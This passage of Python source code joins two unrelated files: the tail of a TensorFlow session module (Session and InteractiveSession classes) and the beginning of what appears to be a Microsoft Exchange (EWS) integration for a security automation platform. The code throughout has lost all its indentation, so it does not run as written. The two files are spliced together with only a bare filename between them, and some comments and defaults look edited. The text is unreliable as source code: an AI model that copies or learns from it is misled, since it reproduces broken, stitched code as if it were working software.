results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
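# For example, both of the following (illustrative) fragments yield the node
# name 'MatMul_1' as match group 3:
#   '[[Node: MatMul_1 = MatMul[...]'
#   '[[{{node MatMul_1}} = MatMul[...]'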
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=object)  # the `np.object` alias was removed in newer NumPy releases
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
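For example, a minimal sketch (the worker address below is illustrative):
```python
tf.compat.v1.Session.reset('grpc://localhost:2222')
```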
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all the
containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(log_device_placement=True, allow_soft_placement=True, gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
EWSO365.py
import random
import string
from typing import Dict
import dateparser
import chardet
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import sys
import traceback
import json
import os
import hashlib
from io import StringIO
import logging
import warnings
import email
from requests.exceptions import ConnectionError
from collections import deque
from multiprocessing import Process
import exchangelib
from exchangelib.errors import (
ErrorItemNotFound,
ResponseMessageError,
RateLimitError,
ErrorInvalidIdMalformed,
ErrorFolderNotFound,
ErrorMailboxStoreUnavailable,
ErrorMailboxMoveInProgress,
ErrorNameResolutionNoResults,
MalformedResponseError,
)
from exchangelib.items import Item, Message, Contact
from exchangelib.services.common import EWSService, EWSAccountService
from exchangelib.util import create_element, add_xml_child, MNS, TNS
from exchangelib import (
IMPERSONATION,
Account,
EWSDateTime,
EWSTimeZone,
Configuration,
FileAttachment,
Version,
Folder,
HTMLBody,
Body,
ItemAttachment,
OAUTH2,
OAuth2AuthorizationCodeCredentials,
Identity,
ExtendedProperty
)
from oauthlib.oauth2 import OAuth2Token
from exchangelib.version import EXCHANGE_O365
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
# Ignore warnings print to stdout
warnings.filterwarnings("ignore")
""" Constants """
APP_NAME = "ms-ews-o365"
FOLDER_ID_LEN = 120
MAX_INCIDENTS_PER_FETCH = 50
FETCH_TIME = demisto.params().get('fetch_time') or '10 minutes'
# move results
MOVED_TO_MAILBOX = "movedToMailbox"
MOVED_TO_FOLDER = "movedToFolder"
# item types
FILE_ATTACHMENT_TYPE = "FileAttachment"
ITEM_ATTACHMENT_TYPE = "ItemAttachment"
ATTACHMENT_TYPE = "attachmentType"
TOIS_PATH = "/root/Top of Information Store/"
# context keys
ATTACHMENT_ID = "attachmentId"
ATTACHMENT_ORIGINAL_ITEM_ID = "originalItemId"
NEW_ITEM_ID = "newItemId"
MESSAGE_ID = "messageId"
ITEM_ID = "itemId"
ACTION = "action"
MAILBOX = "mailbox"
MAILBOX_ID = "mailboxId"
FOLDER_ID = "id"
TARGET_MAILBOX = 'receivedBy'
# context paths
CONTEXT_UPDATE_EWS_ITEM = f"EWS.Items((val.{ITEM_ID} === obj.{ITEM_ID} || " \
f"(val.{MESSAGE_ID} && obj.{MESSAGE_ID} && val.{MESSAGE_ID} === obj.{MESSAGE_ID}))" \
f" && val.{TARGET_MAILBOX} === obj.{TARGET_MAILBOX})"
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT = "EWS.Items(val.{0} == obj.{1})".format(
ITEM_ID, ATTACHMENT_ORIGINAL_ITEM_ID
)
CONTEXT_UPDATE_ITEM_ATTACHMENT = ".ItemAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FILE_ATTACHMENT = ".FileAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FOLDER = "EWS.Folders(val.{0} == obj.{0})".format(FOLDER_ID)
# fetch params
LAST_RUN_TIME = "lastRunTime"
LAST_RUN_IDS = "ids"
LAST_RUN_FOLDER = "folderName"
ERROR_COUNTER = "errorCounter"
# headers
ITEMS_RESULTS_HEADERS = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"textBody",
]
UTF_8 = 'utf-8'
""" Classes """
class ProxyAdapter(requests.adapters.HTTPAdapter):
"""
Proxy Adapter used to add PROXY to requests
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class InsecureProxyAdapter(NoVerifyHTTPAdapter):
"""
Insecure Proxy Adapter used to add PROXY and INSECURE to requests
NoVerifyHTTPAdapter is a built-in insecure HTTPAdapter class
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class EWSClient:
def __init__(
self,
default_target_mailbox,
client_id,
client_secret,
tenant_id,
folder="Inbox",
is_public_folder=False,
request_timeout="120",
max_fetch=MAX_INCIDENTS_PER_FETCH,
self_deployed=True,
insecure=True,
proxy=False,
**kwargs,
):
"""
Client used to communicate with EWS
:param default_target_mailbox: Email address from which to fetch incidents
:param client_id: Application client ID
:param client_secret: Application client secret
:param folder: Name of the folder from which to fetch incidents
:param is_public_folder: Public Folder flag
:param request_timeout: Timeout (in seconds) for HTTP requests to Exchange Server
:param max_fetch: Max incidents per fetch
:param insecure: Trust any certificate (not secure)
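Example (a minimal sketch; all values below are placeholders):
    client = EWSClient(
        default_target_mailbox="soc@example.com",
        client_id="<app-client-id>",
        client_secret="<app-client-secret>",
        tenant_id="<tenant-id>",
    )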
"""
BaseProtocol.TIMEOUT = int(request_timeout)
self.ews_server = "https://outlook.office365.com/EWS/Exchange.asmx/"
self.ms_client = MicrosoftClient(
tenant_id=tenant_id,
auth_id=client_id,
enc_key=client_secret,
app_name=APP_NAME,
base_url=self.ews_server,
verify=not insecure,
proxy=proxy,
self_deployed=self_deployed,
scope="https://outlook.office.com/.default",
)
self.folder_name = folder
self.is_public_folder = is_public_folder
self.access_type = kwargs.get('access_type') or IMPERSONATION
self.max_fetch = min(MAX_INCIDENTS_PER_FETCH, int(max_fetch))
self.last_run_ids_queue_size = 500
self.client_id = client_id
self.client_secret = client_secret
self.account_email = default_target_mailbox
self.config = self.__prepare(insecure)
self.protocol = BaseProtocol(self.config)
def __prepare(self, insecure):
"""
Prepares the client PROTOCOL, CREDENTIALS and CONFIGURATION
:param insecure: Trust any certificate (not secure)
:return: OAuth 2 Configuration
"""
BaseProtocol.HTTP_ADAPTER_CLS = InsecureProxyAdapter if insecure else ProxyAdapter
access_token = self.ms_client.get_access_token()
oauth2_token = OAuth2Token({"access_token": access_token})
self.credentials = credentials = OAuth2AuthorizationCodeCredentials(
client_id=self.client_id,
client_secret=self.client_secret,
access_token=oauth2_token,
)
# need to add identity for protocol OAuth header
self.credentials.identity = Identity(upn=self.account_email)
config_args = {
"credentials": credentials,
"auth_type": OAUTH2,
"version": Version(EXCHANGE_O365),
"service_endpoint": "https://outlook.office365.com/EWS/Exchange.asmx",
}
return Configuration(**config_args)
def get_account(self, target_mailbox=None):
"""
Request an account from EWS
:param (Optional) target_mailbox: Mailbox associated with the requested account
:return: exchangelib Account
"""
if not target_mailbox:
target_mailbox = self.account_email
return Account(
primary_smtp_address=target_mailbox,
autodiscover=False,
config=self.config,
access_type=self.access_type,
)
def get_items_from_mailbox(self, account, item_ids):
"""
Request specific items from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_ids: item_ids of the requested items
:return: list of exchangelib Items
"""
# allow user to pass target_mailbox as account
if isinstance(account, str):
    account = self.get_account(account)
elif account is None:
    # Only fall back to the default mailbox when no account was given;
    # a passed-in Account object is used as-is.
    account = self.get_account(self.account_email)
if type(item_ids) is not list:
item_ids = [item_ids]
items = [Item(id=x) for x in item_ids]
result = list(account.fetch(ids=items))
result = [x for x in result if not isinstance(x, ErrorItemNotFound)]
if len(result) != len(item_ids):
raise Exception(
"One or more items were not found. Check the input item ids"
)
return result
def get_item_from_mailbox(self, account, item_id):
"""
Request a single item from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_id: item_id of the requested item
:return: exchangelib Item
"""
result = self.get_items_from_mailbox(account, [item_id])
if len(result) == 0:
raise Exception(f"ItemId {str(item_id)} not found")
return result[0]
def get_attachments_for_item(self, item_id, account, attachment_ids=None):
"""
Request attachments for an item
:param item_id: item_id of the item to retrieve attachments from
:param account: EWS account or target_mailbox associated with that account
:param (Optional) attachment_ids: attachment ids to retrieve
:return: list of exchangelib Item.attachments
"""
item = self.get_item_from_mailbox(account, item_id)
attachments = []
attachment_ids = argToList(attachment_ids)
if item:
if item.attachments:
for attachment in item.attachments:
if (
attachment_ids
and attachment.attachment_id.id not in attachment_ids
):
continue
attachments.append(attachment)
else:
raise Exception("Message item not found: " + item_id)
if attachment_ids and len(attachments) < len(attachment_ids):
raise Exception(
"Some attachment id did not found for message:" + str(attachment_ids)
)
return attachments
def is_default_folder(self, folder_path, is_public=None):
"""
Is the given folder_path public
:param folder_path: folder path to check if is public
:param is_public: (Optional) if provided, will return this value
:return: Boolean
"""
if is_public is not None:
return is_public
if folder_path == self.folder_name:
return self.is_public_folder
return False
def get_folder_by_path(self, path, account=None, is_public=False):
"""
Retrieve folder by path
:param path: path of the folder
:param account: account associated with the requested path
:param is_public: is the requested folder public
:return: exchangelib Folder
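Example (illustrative): get_folder_by_path("Inbox/Phishing") walks each
path segment under the message store root and returns the matching Folder.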
"""
if account is None:
account = self.get_account()
# handle exchange folder id
if len(path) == FOLDER_ID_LEN:
folders_map = account.root._folders_map
if path in folders_map:
return account.root._folders_map[path]
if is_public:
folder_result = account.public_folders_root
elif path == "AllItems":
folder_result = account.root
else:
folder_result = account.inbox.parent # Top of Information Store
path = path.replace("/", "\\")
path = path.split("\\")
for sub_folder_name in path:
folder_filter_by_name = [
x
for x in folder_result.children
if x.name.lower() == sub_folder_name.lower()
]
if len(folder_filter_by_name) == 0:
raise Exception(f"No such folder {path}")
folder_result = folder_filter_by_name[0]
return folder_result
def send_email(self, message: Message):
account = self.get_account()
message.account = account
message.send_and_save()
class MarkAsJunk(EWSAccountService):
"""
EWSAccountService class used for marking items as junk
"""
SERVICE_NAME = "MarkAsJunk"
def call(self, item_id, move_item):
elements = list(
self._get_elements(
payload=self.get_payload(item_id=item_id, move_item=move_item)
)
)
for element in elements:
if isinstance(element, ResponseMessageError):
return str(element)
return "Success"
def get_payload(self, item_id, move_item):
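# Builds (roughly) the following EWS payload (illustrative):
#   <m:MarkAsJunk IsJunk="true" MoveItem="true|false">
#     <m:ItemIds><t:ItemId Id="..."/></m:ItemIds>
#   </m:MarkAsJunk>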
junk = create_element(
f"m:{self.SERVICE_NAME}",
{"IsJunk": "true", "MoveItem": "true" if move_item else "false"},
)
items_list = create_element("m:ItemIds")
item_element = create_element("t:ItemId", {"Id": item_id})
items_list.append(item_element)
junk.append(items_list)
return junk
class GetSearchableMailboxes(EWSService):
"""
EWSService class used for getting searchable mailboxes
"""
SERVICE_NAME = "GetSearchableMailboxes"
element_container_name = f"{{{MNS}}}SearchableMailboxes"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}PrimarySmtpAddress").text
if element.find(f"{{{TNS}}}PrimarySmtpAddress") is not None
else None,
MAILBOX_ID: element.find(f"{{{TNS}}}ReferenceId").text
if element.find(f"{{{TNS}}}ReferenceId") is not None
else None,
"displayName": element.find(f"{{{TNS}}}DisplayName").text
if element.find(f"{{{TNS}}}DisplayName") is not None
else None,
"isExternal": element.find(f"{{{TNS}}}IsExternalMailbox").text
if element.find(f"{{{TNS}}}IsExternalMailbox") is not None
else None,
"externalEmailAddress": element.find(f"{{{TNS}}}ExternalEmailAddress").text
if element.find(f"{{{TNS}}}ExternalEmailAddress") is not None
else None,
}
def call(self):
elements = self._get_elements(payload=self.get_payload())
return [
self.parse_element(x)
for x in elements
if x.find(f"{{{TNS}}}ReferenceId").text
]
def get_payload(self):
element = create_element(f"m:{self.SERVICE_NAME}")
return element
class ExpandGroup(EWSService):
"""
EWSService class used for expanding groups
"""
SERVICE_NAME = "ExpandDL"
element_container_name = f"{{{MNS}}}DLExpansion"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}EmailAddress").text
if element.find(f"{{{TNS}}}EmailAddress") is not None
else None,
"displayName": element.find(f"{{{TNS}}}Name").text
if element.find(f"{{{TNS}}}Name") is not None
else None,
"mailboxType": element.find(f"{{{TNS}}}MailboxType").text
if element.find(f"{{{TNS}}}MailboxType") is not None
else None,
}
def call(self, email_address, recursive_expansion=False):
try:
if recursive_expansion == "True":
group_members: Dict = {}
self.expand_group_recursive(email_address, group_members)
return list(group_members.values())
else:
return self.expand_group(email_address)
except ErrorNameResolutionNoResults:
demisto.results("No results were found.")
sys.exit()
def get_payload(self, email_address):
element = create_element(f"m:{self.SERVICE_NAME}")
mailbox_element = create_element("m:Mailbox")
add_xml_child(mailbox_element, "t:EmailAddress", email_address)
element.append(mailbox_element)
return element
def expand_group(self, email_address):
"""
Expand given group
:param email_address: email address of the group to expand
:return: list of dicts with parsed expanded group data
"""
elements = self._get_elements(payload=self.get_payload(email_address))
return [self.parse_element(x) for x in elements]
def expand_group_recursive(self, email_address, non_dl_emails, dl_emails=None):
"""
Expand group recursively
:param email_address: email address of the group to expand
:param non_dl_emails: non distribution only emails
:param dl_emails: (Optional) distribution only emails
:return: Set of dl emails and non dl emails (returned via reference)
"""
if dl_emails is None:
dl_emails = set()
if email_address in non_dl_emails or email_address in dl_emails:
return None
dl_emails.add(email_address)
for member in self.expand_group(email_address):
if (
member["mailboxType"] == "PublicDL"
or member["mailboxType"] == "PrivateDL"
):
self.expand_group_recursive(member.get("mailbox"), non_dl_emails, dl_emails)
else:
if member["mailbox"] not in non_dl_emails:
non_dl_emails[member["mailbox"]] = member
# If you are modifying this, you probably also need to modify it in other files
def exchangelib_cleanup():
key_protocols = list(exchangelib.protocol.CachingProtocol._protocol_cache.items())
try:
exchangelib.close_connections()
except Exception as ex:
demisto.error("Error was found in exchangelib cleanup, ignoring: {}".format(ex))
for key, protocol in key_protocols:
try:
if "thread_pool" in protocol.__dict__:
demisto.debug(
"terminating thread pool key{} id: {}".format(
key, id(protocol.thread_pool)
)
)
protocol.thread_pool.terminate()
del protocol.__dict__["thread_pool"]
else:
demisto.info(
"Thread pool not found (ignoring terminate) in protcol dict: {}".format(
dir(protocol.__dict__)
)
)
except Exception as ex:
demisto.error("Error with thread_pool.terminate, ignoring: {}".format(ex))
""" LOGGING """
log_stream = None
log_handler = None
def start_logging():
global log_stream
global log_handler
logging.raiseExceptions = False
if log_stream is None:
log_stream = StringIO()
log_handler = logging.StreamHandler(stream=log_stream)
log_handler.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logger = logging.getLogger()
logger.addHandler(log_handler)
logger.setLevel(logging.DEBUG)
""" Helper Functions """
def get_attachment_name(attachment_name):
"""
Retrieve the attachment name, or a default placeholder name if none is provided
:param attachment_name: attachment name to retrieve
:return: string
"""
if attachment_name is None or attachment_name == "":
return "demisto_untitled_attachment"
return attachment_name
def get_entry_for_object(title, context_key, obj, headers=None):
"""
Create an entry for a given object
:param title: Title of the human readable
:param context_key: Context key used for entry context
:param obj: Object to create entry for
:param headers: (Optional) headers used in the tableToMarkDown
:return: Entry object to be used with demisto.results()
"""
if len(obj) == 0:
return "There is no output results"
if headers and isinstance(obj, dict):
headers = list(set(headers).intersection(set(obj.keys())))
return {
"Type": entryTypes["note"],
"Contents": obj,
"ContentsFormat": formats["json"],
"ReadableContentsFormat": formats["markdown"],
"HumanReadable": tableToMarkdown(title, obj, headers),
"EntryContext": {context_key: obj},
}
def prepare_args(args):
"""
Prepare arguments to be used as the API expects it
:param args: demisto args
:return: transformed args
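Example (illustrative): {"item-id": "abc", "is-public": "True"}
becomes {"item_id": "abc", "is_public": True}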
"""
args = dict((k.replace("-", "_"), v) for k, v in list(args.items()))
if "is_public" in args:
args["is_public"] = args["is_public"] == "True"
return args
def get_limited_number_of_messages_from_qs(qs, limit):
"""
Retrieve a limited number of messages from query search
:param qs: query search to execute
:param limit: limit on number of items to retrieve from search
:return: list of exchangelib.Message
"""
count = 0
results = []
for item in qs:
if count == limit:
break
if isinstance(item, Message):
count += 1
results.append(item)
return results
def keys_to_camel_case(value):
"""
Transform keys from snake to camel case (does nothing if no snakes are found)
:param value: value to transform
:return: transformed value
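Example: {"item_id": 1, "to_recipients": ["a"]} -> {"itemId": 1, "toRecipients": ["a"]}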
"""
def str_to_camel_case(snake_str):
components = snake_str.split("_")
return components[0] + "".join(x.title() for x in components[1:])
if value is None:
return None
if isinstance(value, (list, set)):
return list(map(keys_to_camel_case, value))
if isinstance(value, dict):
return dict(
(
keys_to_camel_case(k),
keys_to_camel_case(v) if isinstance(v, (list, dict)) else v,
)
for (k, v) in list(value.items())
)
return str_to_camel_case(value)
def get_last_run(client: EWSClient, last_run=None):
"""
Retrieve the last run time
:param client: EWS Client
:param last_run: (Optional) last run object
:return: last run dict
"""
if not last_run or last_run.get(LAST_RUN_FOLDER) != client.folder_name:
last_run = {
LAST_RUN_TIME: None,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: [],
}
if LAST_RUN_TIME in last_run and last_run[LAST_RUN_TIME] is not None:
last_run[LAST_RUN_TIME] = EWSDateTime.from_string(last_run[LAST_RUN_TIME])
# In case we have existing last_run data
if last_run.get(LAST_RUN_IDS) is None:
last_run[LAST_RUN_IDS] = []
return last_run
def email_ec(item):
"""
Create entry context for an email
:param item: exchangelib.Item
:return: entry context dict
"""
return {
"CC": None
